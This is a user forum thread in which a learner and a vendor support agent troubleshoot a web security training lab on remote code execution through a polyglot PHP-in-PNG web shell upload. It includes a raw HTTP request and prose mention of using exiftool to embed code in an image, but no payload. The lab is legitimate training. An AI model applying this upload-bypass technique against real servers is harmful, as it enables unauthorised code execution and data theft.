Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

"Remote code execution via polyglot web shell upload "-- not able to read the uploaded file.

lokesh | Last updated: Mar 06, 2024 08:44AM UTC

I get the below error when i try to Request: GET /files/avatars/polyglot.php HTTP/2 Host: 0aa800930455a9d080976cf8008600a6.web-security-academy.net Cookie: session=29GgwnhPI6n0cQ5tSpupMs9GAHJ8uECa User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Pragma: no-cache Cache-Control: no-cache Te: trailers Response: HTTP/2 500 Internal Server Error Date: Wed, 06 Mar 2024 08:40:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Length: 0

Ben, PortSwigger Agent | Last updated: Mar 06, 2024 01:25PM UTC

Hi, To confirm, are you seeing this response when you upload the polyglot.php file within the browser?

lokesh | Last updated: Mar 07, 2024 01:34AM UTC

Hi Ben, Yes, I added the comment to the PNG file using exiftool and converted it into polyglot.php and uploaded successfully. I'm unable to read/get the file, getting 500 http status code. Can you check if anything else has to be performed to successfully read the uploaded polyglot file ? Thanks

Ben, PortSwigger Agent | Last updated: Mar 07, 2024 11:34AM UTC

Hi, When I ran through this particular lab I was able to view the response associated with the uploading of the polyglot.php file, within the HTTP history, and obtain the In your situation you are saying that you are able to upload the file that you have created but when viewing the corresponding request/response pair within the HTTP history you are observing the 500 response? It might be useful for you to email in at support@portswigger.net and include some screenshots so that we can see exactly what you are doing.

lokesh | Last updated: Mar 21, 2024 03:01AM UTC

yes, im able to upload the file successfully. POST request is successful. When i try to retrieve the PNG/polyglot file through a GET request, i get 500 response code. Response: HTTP/2 500 Internal Server Error

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 10:58AM UTC

Hi lokesh, The GET request that you need to view should already be in your HTTP history as part of uploading the file and then navigating back to your account page - from what you have said it sounds like you are sending a separate GET request to try and interact with the uploaded file. Can you confirm whether this is the case?

lokesh | Last updated: Apr 02, 2024 11:25AM UTC

Yes, im sending a separate GET request as im not able to see appropriate request/response showing the executed payload in the HTTP history.

Ben, PortSwigger Agent | Last updated: Apr 02, 2024 12:41PM UTC

Hi, The following screenshot shows the sequence of requests that I am seeing when I upload the file and also the GET /files/avatars/polyglot.php request that gives the secret file within the response: https://snipboard.io/REnfVs.jpg To confirm, you do not see this sequence of requests within your proxy history? If not, it might be worth sending us an email and include screenshots of precisely the steps that you are carrying out so that we can see this more clearly. You can send us an email at support@portswigger.net.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.